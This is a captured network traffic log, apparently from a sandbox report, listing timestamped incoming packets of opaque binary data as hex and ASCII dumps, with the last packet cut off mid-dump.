2022-05-30 12:45:59 UTC	607	IN	Data Raw: 8c f3 55 d0 10 2f 8e ed ad 7d 36 b5 2b eb b2 da 30 8b de a2 d8 97 42 d3 64 01 67 6b 2a af ab 44 d4 24 69 a8 4f b1 46 e5 a3 d2 63 13 99 76 97 e4 b9 db 57 37 fd c9 76 86 ca 07 d4 2e 70 9e 18 4e 86 23 f1 94 54 c0 9d a9 60 4c b3 df 7e 9d d9 7b 17 48 b6 9f 0c 23 8b 85 94 6c 17 41 1c 3e 76 e4 8a 28 54 1f e9 90 77 0e 92 51 c9 76 29 9d d6 a0 bb f2 b4 b4 20 02 32 b8 20 d1 c6 a9 fa 5c f2 90 59 97 71 26 17 64 e8 69 a7 31 a2 72 b4 43 f6 3e 93 d2 ef cf 75 c5 dc 51 4c be fb c9 ea 48 ad 93 0b 3f a0 36 25 dc 93 a5 f6 2c 68 8e 37 8d c4 67 fb db 17 de 3e 39 87 1c 2a 57 15 c9 38 d5 f5 8c d0 30 65 4d 44 b5 c1 47 09 bf 51 f8 48 f4 14 bf 41 96 2b 6b 09 50 7d 46 35 c7 11 2c 80 57 51 f5 14 a9 72 f4 5a f0 a3 e4 f1 18 04 9b b9 97 f4 1d 8f d4 bd 0e 03 70 76 b3 43 8f 33 28 39 95 b4 Data Ascii: U/}6+0BdgkD$iOFcvW7v.pN#T`L~{H#lA>v(TwQv) 2 \Yq&di1rC>uQLH?6%,h7g>9W80eMDGQHA+kP}F5,WQrZpvC3(9
2022-05-30 12:45:59 UTC	609	IN	Data Raw: 27 d1 0b 0e 3d c9 d0 75 bc 57 85 4a 36 ae fe 2e 6f da 35 5e 1e ab 90 e5 04 7c 75 ac 35 5c 9d 12 54 99 93 71 05 f9 47 0a f8 cc 74 8e 2d 18 ea f5 35 d0 b0 a4 f2 a0 23 5b 41 97 48 ee b4 64 7b 6a ad 00 67 f8 4b a1 1b 50 a2 25 d4 2e 00 69 e1 ac 03 ea 21 c7 67 e4 2e 5f 0c 44 f9 cf 2e fe 36 19 2d d0 d9 61 7d e1 26 8c c6 7d 02 56 66 e8 0f 1e 9b f6 8b c8 8d a7 b9 e3 94 eb d9 65 2d cd c3 5d fa 84 c6 22 fa ef 11 5a 37 fa b9 5b 39 e2 30 a6 c3 0c f3 08 38 66 36 ee 5f b7 3e e2 8b 71 c7 0e f4 6d 11 5b cd 5b eb 9b 84 15 09 58 dd 58 ad 62 5a b4 22 fe 2a 98 f8 a8 61 46 b4 02 ed de 3c 8d 67 20 4d b5 4a b7 14 50 19 f5 11 3e 46 bc 60 de 48 33 42 cd 3b c8 1c 83 c7 36 33 29 57 15 23 04 a4 4a 09 97 06 21 fe af f2 7f 0e 1e bc ae 68 14 7d 89 54 8a 42 17 84 2a d3 76 ee 5c da 87 d8 Data Ascii: '=uWJ6.o5^\|u5\TqGt-5#[AHd{jgKP%.i!g._D.6-a}&}Vfe-]"Z7[908f6_>qm[[XXbZ"aF<g MJP>F`H3B;63)W#J!h}TBv\
2022-05-30 12:45:59 UTC	610	IN	Data Raw: 22 c9 35 5c bf 87 cc 12 b0 ee c9 a2 23 46 5a b4 65 f8 cf b1 c3 2d 3f 77 32 7f b7 99 2e d3 c4 a0 61 80 29 91 2e 48 40 c5 8a a5 86 fe c6 6b ae f1 d6 b5 1a 4c 76 7f 04 a8 9b e4 c5 d1 60 f1 f8 a6 79 c4 52 58 3d 63 a8 e9 11 97 b9 4a 00 83 0d 4b 8e c5 8d c2 3d a2 77 04 65 9c 45 4f 95 0f 52 f0 bf 3f 65 4c 1b f7 72 de a7 73 c9 7e 16 20 16 f4 a1 d3 a6 b8 3c 23 47 a9 da c2 b7 fe 69 42 9a 04 cb 28 fb 79 f9 e4 c9 9e c6 f8 47 90 94 b1 8b a0 e6 ab b2 d2 6e e0 15 42 fb d2 9c 9a 48 c3 43 81 93 a5 f1 19 62 31 2e 1f 8f 05 44 41 38 d7 67 71 1b 1a 3a 1d 3c 37 bf 6b 7b e4 8d d0 1f ac a4 90 00 36 10 b6 66 f4 bd 3d e3 5b 32 32 07 90 26 57 66 6b 21 87 03 84 f9 75 dd 4a 41 44 9f 69 33 9b 00 e6 0b 25 3a 6d 79 cc 8f df ba 94 be 0a 00 c8 2e 8a 43 07 6c 91 49 f5 3d 48 e7 22 d0 a1 fa Data Ascii: "5\#FZe-?w2.a).H@kLv`yRX=cJK=weEOR?eLrs~ <#GiB(yGnBHCb1.DA8gq:<7k{6f=[22&Wfk!uJADi3%:my.ClI=H"
2022-05-30 12:45:59 UTC	611	IN	Data Raw: 0b d5 a1 97 1d 8f 38 15 0a 0b 65 3b 9e 6c e3 c2 8c 66 97 92 89 bc e1 c0 18 24 d2 44 32 fe 2d 54 a2 b8 e7 71 c5 14 5e 7e b7 53 d5 58 0f 7f 49 6f 40 28 29 b9 ec 5d 44 6c dc cd 04 90 cf c0 09 96 16 00 d5 eb ee a1 b2 66 27 b4 43 f6 6a 95 cb 17 5a f7 1e ea ad 78 df b5 b8 6d 40 2b 53 7e 04 e1 01 02 ed 53 63 75 41 6c 36 8d 77 64 c6 4d a8 24 1b d5 f5 b1 4f a7 12 9a cc 04 85 16 6c d6 f6 64 1c 15 6a 7a 16 25 5c c6 11 ba 0a 81 40 92 d9 10 0b fd 61 31 9d ea d0 e4 6a 0a b2 87 39 14 81 56 2a a0 e7 d1 6e 33 9b f3 7e d6 50 3f c8 1d 2b f3 92 b7 05 77 39 89 e3 12 76 53 18 af 52 65 d2 f0 f5 d9 12 87 4d 25 86 fa e1 39 53 a9 61 92 79 53 8a 3f 69 6c f9 78 d9 63 96 6f 3e ae 5d c4 37 59 22 20 1f 0a a5 94 9e 18 9a a5 82 76 4b 4b f7 f8 2d 55 85 e9 b2 79 73 ef 1a 1b 2d 34 54 f7 b9 Data Ascii: 8e;lf$D2-Tq^~SXIo@()]Dlf'CjZxm@+S~ScuAl6wdM$Oldjz%\@a1j9V*n3~P?+w9vSReM%9SayS?ilxco>]7Y" vKK-Uys-4T
2022-05-30 12:45:59 UTC	612	IN	Data Raw: c1 8f f9 9e 90 3f 7e 75 66 79 c4 33 25 57 cd 89 ab d8 92 1f 50 3f 19 d8 48 7c fc bb 4d 63 cd eb e8 69 af 30 dd a5 4c 46 56 eb db 12 12 fb 67 87 3b 2f b9 b8 a7 b0 4c 14 f3 48 f8 c4 99 c3 6d 0b 35 39 df 3c de 20 53 f9 f2 6b 60 15 44 b7 27 87 05 6e 7b 9d 3e 4a 33 79 cf cd f8 b3 e9 3e 27 5c 0b 8f 5d 6c 1c c0 33 e0 3a d9 58 d9 3f 13 9d e4 40 6c 41 f8 a9 b8 ba 4b fd eb 0f ec 06 a9 c8 d5 9f b6 cf 0d e5 e7 0a 67 8c a1 99 43 e9 5a 75 4c 46 f5 55 1b 29 c7 bd 92 a5 73 29 1d 2f 03 b4 72 c9 73 9a 25 06 27 87 95 5b 18 f4 b7 66 f2 61 56 68 b5 65 1b 68 7c 3e 9c ff 03 2b 74 6b 7b 0b df 50 5b b6 94 40 02 31 f0 93 bf 4d c6 77 00 6a 67 ae c4 c3 10 b5 6b 9f 6f 27 00 61 ae 62 27 ae a9 5f 91 d7 99 e2 23 d1 5f 4a 4d 9c 6f 2b 50 fb 9c 30 02 82 ac 42 18 32 3f 12 57 65 06 07 f7 65 Data Ascii: ?~ufy3%WP?H\|Mci0LFVg;/LHm59< Sk`D'n{>J3y>'\]l3:X?@lAKgCZuLFU)s)/rs%'[faVheh\|>+tk{P[@1Mwjgko'ab'_#_JMo+P0B2?Wee
2022-05-30 12:45:59 UTC	614	IN	Data Raw: 81 3c 5f bc 67 71 2f 43 0e 84 23 ac e9 58 13 a9 3a 8c 0a 03 17 6d bf 89 5f 22 30 20 2e a0 36 6c 9c 61 9a 6a e1 97 05 f8 a7 92 ee 18 e3 3e 58 55 af e7 72 cd 37 03 25 1c 3c 1c 57 14 07 a6 f7 f4 3c 81 8f 7f 2f 3d e8 32 12 ad 42 99 27 26 df b0 34 fe 49 61 4f 9b a3 d1 77 7f b7 4a 69 01 64 47 c1 b0 dc e1 92 9c 3a 2f 25 e7 7b cd a4 88 39 6a 5e 90 9a 21 1f 7d ea a7 cf 27 95 f0 96 a6 42 04 58 8d 7a 2b 2a 90 0c b6 f2 f9 c7 51 98 32 24 e3 60 ca 95 26 89 84 15 79 d8 50 a8 46 5a 51 3e 55 f8 60 15 62 63 e9 52 6b 70 ef 2a 7e 31 e3 f6 54 59 46 f9 91 44 ff 21 e8 77 b7 22 3a 3c 78 90 31 f7 64 2b 1b 5e 1e fa d8 c2 33 cc 6e f9 17 e3 12 a5 87 2b 92 19 67 b3 87 00 99 0b 02 fe 47 7c 43 97 8e e2 5a 37 93 ef 57 74 59 11 8d 92 5c cb d4 ad e0 dd a2 73 95 a6 bd 51 27 bd 75 79 dd 51 Data Ascii: <_gq/C#X:m_"0 .6laj>XUr7%<W</=2B'&4IaOwJidG:/%{9j^!}'BXz+Q2$`&yPFZQ>U`bcRkp~1TYFD!w":<x1d+^3n+gG\|CZ7WtY\sQ'uyQ
2022-05-30 12:45:59 UTC	615	IN	Data Raw: c0 1e db 7f 5d d4 ce d2 e9 77 74 84 69 c9 36 41 56 4b 4c a9 e2 6a 6f 88 27 d6 49 f8 df 77 37 0c 18 6b b0 b0 bd 91 72 8c be 58 1f 76 58 27 ab e6 57 c8 b7 11 c9 99 76 e2 a1 c0 87 6d e5 a2 09 e4 3e 32 05 41 8c 7a b9 50 60 8e 2a f9 a8 7f f3 6d a5 b6 4f c6 b0 8d f4 38 8a 26 94 45 5a 85 3c ff 45 1a 23 fd bf 39 e7 90 7f f3 d7 4d 3f ac 13 f8 88 c6 61 ba 98 b8 0d ce b0 f5 b5 d9 af 92 5c 12 7f 95 b2 5a 87 8d a0 db b2 00 70 db b0 4e 7f de c5 24 4d 7c 8c 96 6f 37 ee 8a a1 09 60 57 ee 1c 82 7d 3f 0f 9c 3f 2a de b0 f9 75 d2 3c 17 d4 bb e4 fd 5d 67 61 c5 e8 5b dc 8e 78 d2 cd 56 77 ba 34 ef 48 44 14 c5 ee 3f 7c 5d b5 6c 5d d8 96 25 8f 64 37 b0 5f 07 18 55 29 12 9a fe 33 20 50 db d6 fc ab c2 36 e4 23 b9 b2 1f 39 76 5e bc 13 f6 9a 1d 76 fe 5f a3 16 d5 46 c2 19 16 1b 7f 17 Data Ascii: ]wti6AVKLjo'Iw7krXvX'Wvm>2AzP`mO8&EZ<E#9M?a\ZpN$M\|o7`W}??u<]ga[xVw4HD?\|]l]%d7_U)3 P6#9v^v_F
2022-05-30 12:45:59 UTC	616	IN	Data Raw: c4 a9 9b 88 99 67 a4 97 a5 b0 73 32 78 e7 e0 c7 db 4d fb c9 8e 06 0a 8f 90 33 fd 51 65 3e a9 f9 56 95 65 e9 8b a9 7c 2c 9d 0f e8 58 3f f7 b0 1f 01 59 d9 b7 fc 7a 70 8b 00 06 10 c8 de 49 b5 2e c6 24 95 69 ca f8 b9 ad 61 8d 45 9e 4c 33 c2 ab b1 90 52 17 49 16 a7 62 a0 88 2d 8a 65 a2 26 21 fe a7 64 36 c1 81 3e d3 f9 e9 d8 eb 11 9c 42 37 f0 99 ae 2b 3d 17 9e 3b f4 97 de 0b 54 9c 27 99 3d bc 02 b5 3f 8e bc 5b d6 81 f2 e5 21 12 29 09 6a 8a e1 db b9 34 51 0b ae 5c 00 d0 a9 58 91 e0 af e2 23 03 80 9e 00 94 44 77 8d 64 c4 ea 2f 02 c9 1a bf 42 f0 15 3d f0 e9 eb 1b 85 c7 39 c2 b7 cd b1 ca e4 8a 9c d7 6b 55 8a a8 67 62 75 ed fb 3c 34 43 9c c9 49 6f 7c 0f 0f 46 9c 55 bc 82 3d 58 f3 42 86 c4 91 d3 5c 28 ef 15 7b 54 5b a0 71 d9 28 1b 8b e1 de 8b 8c 06 56 dc 47 da 57 bb Data Ascii: gs2xM3Qe>Ve\|,X?YzpI.$iaEL3RIb-e&!d6>B7+=;T'=?[!)j4Q\X#Dwd/B=9kUgbu<4CIo\|FU=XB\({T[q(VGW
2022-05-30 12:45:59 UTC	617	IN	Data Raw: 25 52 9c 3b c6 ec 7f e3 80 24 53 db df 96 65 dc 69 75 ef 6c 34 35 79 3c bc eb 39 f0 48 85 f1 79 97 6c 9a 3a 53 bd e7 20 67 86 fb 02 e3 82 2b ab 19 d0 c1 61 c6 6d ea a9 52 e0 aa 35 ef 5c 86 85 5f e6 14 50 e6 0d 67 87 31 99 b1 6b 27 86 24 e0 fb 75 45 d4 17 94 d5 4f af 91 59 3e 9f b0 e7 17 ff af 3b 24 c0 ab 40 f1 33 8f 51 93 bc a7 32 33 fa 71 01 d1 93 07 49 22 c5 bf 9b 57 60 b0 90 7c 4c d5 e1 36 c9 46 6d a8 80 fb 9c 91 7f 5b fc bb 40 c6 ec bf 0a 3b a3 0b 02 e8 2c 7b ce e1 4c e6 95 35 e6 01 09 a1 c3 b8 04 f5 ba 98 81 39 33 32 79 b0 1c 27 4f cd d5 c9 7a a3 e0 b8 24 3d 28 32 25 06 30 8b 82 1f ec 3f ee d8 72 b3 b1 a6 cf a7 81 ac 18 e3 17 59 f0 48 0f 7e 8f d4 7c a7 e8 ca 3a 03 3e 2f 73 0f 8b 6c 83 76 3d d4 8f 76 98 9a 7a 37 a5 8d da 46 78 d3 69 bc 9e c7 0b 1d 2b Data Ascii: %R;$Seiul45y<9Hyl:S g+amR5\_Pg1k'$uEOY>;$@3Q23qI"W`\|L6Fm[@;,{L5932y'Oz$=(2%0?rYH~\|:>/slv=vz7Fxi+
2022-05-30 12:45:59 UTC	619	IN	Data Raw: 10 8e 1f 0c cb d8 54 47 8a 35 c6 0c 63 21 9d d6 f9 a6 62 04 04 cc 05 83 c0 82 97 4a c3 5a d9 f0 a8 6c 3a 25 ad 39 f3 eb 0b e5 a9 c9 db 01 b2 44 c1 9a 22 77 87 68 9b 70 d2 c3 22 25 12 7f 4d a0 29 f5 77 fa 50 6b 17 1f b5 5f 3a 04 95 ec 5d e6 c8 d6 56 e4 3b 58 80 9c f4 90 dc aa 38 d0 af b4 17 17 0f a7 68 5d 19 47 83 03 63 26 bd 32 cc 1b 67 47 4e c0 31 dc e4 bf cd cf fd 9f 2a f0 e2 4d 7d 2f 09 6d 12 ba 6e 7d 09 fd 70 9c b7 77 eb 2e 0d d2 51 41 da 92 9e 7c 57 c9 df 47 97 7b 27 70 ca b6 dc b6 b8 23 06 8e 00 60 c8 e0 2c 1c 78 f3 ff 57 17 32 c1 c7 a8 d2 fe 08 fc 29 0e 78 6e aa 66 44 db 20 bb 5b 74 c7 cf 7f c8 22 c1 c9 44 08 da 41 f1 dd a2 64 d2 43 3c 3b 08 8e 5a 5f 5c cf a1 4d 28 4a b9 42 f0 b9 d9 58 09 af f7 30 74 5a 6f 2c d0 de d9 20 3c 2e 19 3f 54 bd 10 12 cd Data Ascii: TG5c!bJZl:%9D"whp"%M)wPk_:]V;X8h]Gc&2gGN1*M}/mn}pw.QA\|WG{'p#`,xW2)xnfD [t"DAdC<;Z_\M(JBX0tZo, <.?T
2022-05-30 12:45:59 UTC	619	IN	Data Raw: 33 b0 77 15 58 f8 3f 1d c8 c9 3b d8 77 da ee 9e 2c d3 08 71 5a dd 2b 10 79 72 e0 c4 27 a1 3e 17 05 cb 9e 10 89 da e4 f6 03 d9 40 68 03 5e 61 3c 12 0e 08 72 38 62 87 71 73 76 0d 41 3f 01 dc 78 ba dc 7c 32 82 b3 4c 3b 53 1a 35 19 ce 72 c7 2e e9 a2 ff fd 1c 7f 60 b7 b0 35 5e f6 6e f9 05 1e d2 4b ed 41 3b 91 83 e0 d1 eb 8f 3a fe 9b 68 47 80 c7 43 53 5c e7 56 99 63 5a 80 58 58 dc 4b 2a d0 cf 2d b6 a7 8a 76 22 98 3a 75 29 a9 3c 6f 26 6f 21 62 6b 3f ce dc d7 44 96 3f aa c7 10 3d e6 4b 63 11 7c 3a e1 f6 0a 45 8d 0c 66 a0 c3 fa 29 02 b0 db 89 41 da 28 de 6c 76 74 fc 8b df b6 44 a8 c2 0c e4 a9 fc e9 e9 7e 49 49 b7 ed a9 c4 cd fb eb 51 2d 3e 5e 87 f2 d2 fe f7 03 29 0e 60 dc 1c a6 30 df aa d5 a9 58 c3 61 6b b2 fa fb bc 8c 08 5f a4 01 04 cb 8e 59 47 b9 e2 11 1b 55 ca Data Ascii: 3wX?;w,qZ+yr'>@h^a<r8bqsvA?x\|2L;S5r.`5^nKA;:hGCS\VcZXXK*-v":u)<o&o!bk?D?=Kc\|:Ef)A(lvtD~IIQ->^)`0Xak_YGU
2022-05-30 12:45:59 UTC	621	IN	Data Raw: 82 5a 19 ab 26 a7 38 f7 1f 13 b4 01 bb ca 1f 06 40 b8 4b 16 68 e2 00 56 41 68 ac 49 b5 cb 39 e9 d4 ca 2d a2 8e e5 94 d4 cd 64 3b 43 76 c8 7f 01 cd 0a dc e6 7a 22 d1 cf a7 30 8b 7e 7b 26 0d 5f 50 80 d0 5b b8 53 7f fb d1 36 55 01 b5 63 d5 31 7c 8b 3b 29 fb 7e 8f 17 7a 98 ef 78 c4 c5 e2 37 8e fd 87 50 c3 5f 29 ce 84 7e 63 bf 10 bd 95 25 8c 53 3e 27 00 0b ad bb 46 7a a9 44 29 78 fb d2 34 7c f4 91 a6 94 72 ab 17 21 1a 45 99 93 a8 91 18 27 d4 1d b6 bc dd 42 4a 75 7c be 67 c3 c3 63 ab 75 5e 8c 84 65 79 a2 3f 1b fa 6d 9a fd 21 14 54 9b 84 58 c0 75 6c 30 64 33 08 5c 51 ba a8 1f 85 66 94 91 61 fd a8 fd 0f 02 1a 15 9a a2 4d a7 9f ff 62 a3 0f cb ac 8d 07 25 e2 5a 32 7f ce 7c a3 1f 5a 43 a9 f4 20 c6 18 d9 d6 60 e6 72 a9 43 b2 d4 34 d3 f4 a4 70 0d 56 32 83 36 42 d5 76 Data Ascii: Z&8@KhVAhI9-d;Cvz"0~{&_P[S6Uc1\|;)~zx7P_)~c%S>'FzD)x4\|r!E'BJu\|gcu^ey?m!TXul0d3\QfaMb%Z2\|ZC `rC4pV26Bv
2022-05-30 12:45:59 UTC	622	IN	Data Raw: 8e dd 84 21 d1 d3 67 0d 52 4e 95 cb 5f 6f 61 1f 4b 89 0e 4a fc 39 f9 4b de 1f 16 34 aa 66 c3 01 f2 fd 48 ab 24 16 31 f8 ad b0 10 1b 58 4a ee 78 63 15 1f 9c d0 80 e5 2c 75 d5 db 85 c5 a2 d1 33 ed bf b4 00 ef 6d 33 8a 86 8a c8 7c 6e 33 66 88 de 44 69 ca 14 de c5 40 13 55 2a fe 87 0e 03 d3 c9 36 e1 46 78 39 87 17 f9 9f 05 fd 77 db 4f 7c ea e7 1d cf ec 3a 15 7c 4b 82 bc ce 17 3b 27 07 53 b4 d5 3b a4 b8 da 32 72 15 1e 1a c9 1a fb 53 f3 db 0f 6a a4 5e 86 e2 19 0d 53 56 29 32 d1 46 e8 b2 f6 37 ee a2 ae 67 78 b7 6f d7 28 72 87 23 77 39 7c f0 0f 0b 2f f1 38 06 9b 37 9c 49 e1 fa b3 78 6f 17 68 3a 2f a6 28 73 78 b6 03 7b ac 05 da 6e 64 03 e0 f7 61 ba ac bf 89 72 de 36 e1 7d 38 b9 26 d2 40 c7 f8 31 bd 97 8c 1f ed 6d 62 83 15 e6 17 85 e4 30 83 8a a7 a1 e9 9c 6b ad 88 Data Ascii: !gRN_oaKJ9K4fH$1XJxc,u3m3\|n3fDi@U*6Fx9wO\|:\|K;'S;2rSj^SV)2F7gxo(r#w9\|/87Ixoh:/(sx{ndar6}8&@1mb0k
2022-05-30 12:45:59 UTC	623	IN	Data Raw: 7f 84 94 c7 87 27 a2 06 c1 02 70 c5 ca eb a0 03 ff 52 18 a6 7e f8 d3 19 a7 85 2e 7f b2 c0 05 12 be de 58 39 5a ee b5 c5 4e 05 e1 33 bd ca 04 9f e2 4b 3f 22 2c 86 ba c2 e5 df f4 b6 d1 aa e8 94 34 ab 6a e3 9a 7a b8 85 ea 19 7c ce f6 2b 60 da 32 c0 ce 23 89 b4 c6 30 32 72 46 7c 5e a7 5a ea b0 33 f2 ff 21 bb 07 4b c6 94 b9 1d 91 09 c4 ca 92 ff 54 a3 18 96 ce f3 7e 7b 48 b4 31 d9 07 f1 c3 e2 5d c3 60 86 0e dc bc 13 56 9a 85 35 c3 d2 52 62 d2 fe 3d 2d 01 08 a2 2b 66 0c 6f 1d a7 ba 2d 28 25 6a bb c5 d9 bf 0f 66 cf f8 d2 8c 0b a5 2a e3 3e 58 51 b8 cd c7 3a 9a e8 78 71 08 97 bd 61 0a 72 f8 37 6f 57 e5 3b 8b c8 73 9e 42 94 b0 a4 30 ad 25 07 68 6b 48 02 65 ee 12 32 71 72 cf c6 41 ba 87 c4 ff 33 c4 db 19 c5 79 90 d1 c3 5d 86 71 e1 0b cf ca 94 37 36 6b 8a e2 73 a5 7d Data Ascii: 'pR~.X9ZN3K?",4jz\|+`2#02rF\|^Z3!KT~{H1]`V5Rb=-+fo-(%jf*>XQ:xqar7oW;sB0%hkHe2qrA3y]q76ks}
2022-05-30 12:45:59 UTC	625	IN	Data Raw: 39 c5 d0 93 eb f6 5c 5d 9d bc 9c 3f 0c f4 28 93 1d 9f 17 d7 17 6d 81 ef 64 c4 d2 d3 4c 0c 10 d5 af 3c 18 fe b7 a8 6e 05 f6 58 db d1 33 64 f0 c9 9f e8 23 eb 36 8a 9c cb ac 78 2e 70 a5 6c 19 4d 6e b2 1a 3a 68 90 7f 9f 74 ea 82 25 16 3c cf f0 1c 3d 73 0e 36 6a 8a 11 77 95 3c 3c 82 b0 f0 47 d2 36 e5 9d ff fc 19 ef c3 c9 76 78 1f de c9 45 0d 4b e4 1b b3 74 b8 be 52 02 dc a7 0c 28 b7 d4 1a 1d 5a 11 d4 0f 94 b2 31 a2 2b 89 8b c0 32 1e 6e ef 42 f8 a9 a0 47 f4 22 e6 b0 03 49 5c 02 fd ee 21 fc 46 5d 7a a4 86 6b 05 32 d7 58 f1 ec 32 70 94 d9 20 0a 5e a7 ef 1d 4c 20 52 d2 9d 68 0e 34 23 1c fc 8a c1 cd fa 8c ae 53 fc 0a 02 df c2 52 0f 38 f8 ab 23 b9 23 ad 4e 72 0b 0a b0 75 d1 45 b3 2a 0c c3 55 d7 87 d8 3e bf 14 12 7f f3 d8 e5 f9 69 49 fb 63 bc d8 a9 50 30 53 78 98 f7 Data Ascii: 9\]?(mdL<nX3d#6x.plMn:ht%<=s6jw<<G6vxEKtR(Z1+2nBG"I\!F]zk2X2p ^L Rh4#SR8##NruE*U>iIcP0Sx
2022-05-30 12:45:59 UTC	626	IN	Data Raw: 03 40 4f b4 ce ee f0 75 2c 37 24 4f 32 fe 2e e7 ec 5e 74 a4 bf 90 1a c9 f6 3c 5f fe 01 c3 d1 8f 46 46 ec 99 8d 0a 37 71 ea 8c 24 55 9d ae c7 3c 3b 50 6a fd 17 2e b3 ab a7 d6 65 7a bf 64 6a a9 8a 7d 24 d1 7a c8 1b 26 eb 2d ed ed b9 65 c0 00 e9 d9 43 fe 9c 94 1e c2 47 1e b9 2b 16 b0 d3 09 c8 30 1f 25 8a 51 ef b1 52 c1 9f 9f ab db e7 d1 a6 84 89 8d ed b8 e3 94 20 63 39 4e c4 1c 27 cc 73 07 d2 0d d0 9b a8 ef 39 c5 fa ec 1d fb a6 ea 32 f3 08 ea 77 44 36 cd 42 ff e6 0b 8e 38 32 89 e0 20 aa 0a a2 b8 7f 7b 24 1e 54 ab 29 12 e4 9a c1 9e e1 2c 96 f7 2c f3 7b 1e 76 8c d9 56 8d 58 45 1b b5 e2 b7 4b 75 e5 0a ee 43 0b 35 16 d0 c5 e8 f0 ca f7 20 7e 28 b3 1e 5e e4 d7 5d 2a 9e ff c0 4d 4f ff 66 75 dd 5b bc 6e af df df 18 3c 09 25 22 77 7c 61 41 6a 7c fc 30 d5 eb 0a ce 1d Data Ascii: @Ou,7$O2.^t<_FF7q$U<;Pj.ezdj}$z&-eCG+0%QR c9N's92wD6B82 {$T),,{vVXEKuC5 ~(^]*MOfu[n<%"w\|aAj\|0
2022-05-30 12:45:59 UTC	627	IN	Data Raw: 5f 2d 4f 40 c4 52 fa 4f ac fe b6 96 5e 46 4a 36 66 0b 00 00 0c d7 a5 0e 71 93 cf 1f f1 38 2b 31 94 86 89 0d 3e b5 29 e9 04 28 f6 d0 28 da 2e 36 b9 ad 91 88 3f 9a 48 69 79 03 3e 4f 1b b4 a7 79 cb 9d d5 92 8c aa a8 a8 c4 46 3e ab f8 67 d0 91 62 5b d2 38 b3 d8 fb e6 f0 98 36 d3 c1 e3 23 16 43 f4 83 ce 6e af e4 85 de 9e 82 1e 9c e0 69 51 40 cb 32 ae 68 35 cb dc f4 9b fc 69 c8 da 99 49 7c b0 18 10 5d 8f ef 4c bc 63 06 e0 4a 08 26 26 df 38 28 3c 1e ed 36 c7 60 89 d6 ae 90 13 69 69 44 b8 3e 6a e3 78 52 cd 71 dc c8 c3 28 13 b6 fb 2a 08 d3 d5 be 31 bf c8 45 51 2e 5f e2 b8 26 8c a0 9a 77 38 ba 71 cd 53 c0 3e be 56 ab f5 a0 95 f2 ef e6 38 36 26 85 00 97 1f 1f 14 e6 60 05 dc e6 50 7c 07 5c 15 96 a3 da 66 5b 84 c0 d2 55 89 fd f8 7c 12 24 54 34 fe 2e e5 66 92 0e bf 7f Data Ascii: _-O@RO^FJ6fq8+1>)((.6?Hiy>OyF>gb[86#CniQ@2h5iI\|]LcJ&&8(<6`iiD>jxRq(*1EQ._&w8qS>V86&`P\|\f[U\|$T4.f
2022-05-30 12:45:59 UTC	628	IN	Data Raw: 69 14 58 74 63 3e ad 72 a6 ee 2f 51 f1 96 78 7f 08 0f 6b 87 1c 74 1f 69 34 bf f2 c7 07 59 d9 ed 5b 76 fe 13 53 41 4c b6 0c 12 d2 c4 45 03 78 9c b4 fc 8a d3 86 ab f9 37 a2 b4 92 bd 2b e5 42 87 b3 10 e5 4c 9d b2 4e 07 b2 e7 a7 70 1e d4 66 14 af 22 da 25 41 dd 34 bb e8 48 28 de e1 8b 22 88 04 55 b8 28 f6 71 ea c0 f8 7b b2 1f 34 f0 7d d8 bf 1f 54 c9 8b 11 c9 99 ad a6 b9 94 7f 32 41 00 9e 34 6e bf 41 10 85 40 37 4e cf 60 92 ba 14 7f f3 17 e6 7d da bd 8e 0a 63 d8 2c bb d3 61 7a cb 0c 93 bd e9 e0 9b 78 40 89 b7 5b 7e 9c 79 d5 d5 7b df ac 96 88 11 de 76 53 18 e8 f5 b5 c5 6d 3c 5d 1b f5 ce 6d 8a c5 c9 fa 50 80 ee 57 da 7f b2 fa 1e 33 05 e2 87 60 e2 49 b4 a1 7c e2 b7 e4 48 64 48 e4 3d d8 5b 33 ec f1 41 58 ec b7 ca 9a 6d e2 4d e6 09 83 7c 94 c3 b9 5b 23 28 88 ad 0e Data Ascii: iXtc>r/Qxkti4Y[vSALEx7+BLNpf"%A4H("U(q{4}T2A4nA@7N`}c,azx@[~y{vSm<]mPW3`I\|HdH=[3AXmM\|[#(
2022-05-30 12:45:59 UTC	630	IN	Data Raw: 0c 7d 8e 15 21 17 dc 27 e3 b0 1c 53 e8 f4 1e 05 9e 94 1f 50 ba 43 2c cb 2c fe bb 38 07 43 c4 69 63 7c fa ff cc dd a2 33 14 51 cc 96 83 4e 86 81 f4 7e 30 25 7f 65 af 66 3a 75 c7 fd 5b 5a 59 63 bc 7e 37 02 ef b6 66 95 ae 25 da 5a da 9a 89 3e 15 0b e3 e7 20 16 7f dc f5 5b 42 20 76 88 9b 73 e7 ce 38 4c 71 c5 6b e6 26 2f 1e c3 89 41 39 26 62 d6 d3 30 d9 b6 70 27 1c 82 83 fe a8 bc 53 ca 4d 4a 89 be d4 ca b1 96 d8 e6 4d 13 4f 64 7d b0 7d 64 5a 6a 04 e7 c2 c9 a2 de f1 d5 e6 ce 4c bd 06 aa 0a 19 5e 3e 8e 97 14 50 ab ab f7 95 e5 8e c1 ea 84 a0 72 b2 cd f0 6b 76 ba 87 c4 0b 5e 00 4c 00 30 3e 93 03 94 2f 04 e0 b7 01 d5 9c 93 f5 60 ef d5 00 6e 96 a4 26 83 a9 52 1d c5 89 fa 17 40 00 05 1b f7 80 08 85 d2 c5 07 f3 ad 16 b4 5a e3 37 24 19 8a 1a fd 4d d5 14 a9 ce 1f d2 1f Data Ascii: }!'SPC,,8Cic\|3QN~0%ef:u[ZYc~7f%Z> [B vs8Lqk&/A9&b0p'SMJMOd}}dZjL^>Prkv^L0>/`n&R@Z7$M
2022-05-30 12:45:59 UTC	631	IN	Data Raw: e6 ac c6 3e dd af cd f9 db cc 06 15 1e cf 21 da af a5 14 8e 22 70 61 97 ea eb f3 26 a7 65 b9 93 ce 4f 1c df 4a bb 80 45 9a 4d e9 97 08 58 d0 46 30 a9 16 43 36 58 8d 17 4b cf da ad 9e a4 1c ff de 91 b0 f6 9d 7d 87 6d 29 4f 46 af 52 fb a5 41 79 3b ce 96 d6 ee 35 f1 c2 e7 67 04 3d a5 c8 1c ce 45 02 a1 02 a7 f3 94 98 ab 5c ee 1c 81 7c 38 d6 35 f9 7c 10 e8 4d a5 69 45 f8 f6 bd 72 c4 87 71 85 c0 23 a4 7e 48 0d 8d 70 af 64 c5 1f 10 90 97 c1 53 01 68 44 4e 9c 71 70 6e d5 14 4d dd 16 49 9c 7d 10 42 21 b4 8d 9c 51 35 10 2c 9d 65 b8 cd 33 4b f5 7b ee 15 25 0e 56 c5 40 6f 7a 6f f0 be d2 1b 2b 99 21 19 26 f0 3e e2 ac eb eb 31 4c 9e 4e 94 e7 e4 77 3d 56 a7 8c c8 41 2e 08 4b 57 a8 61 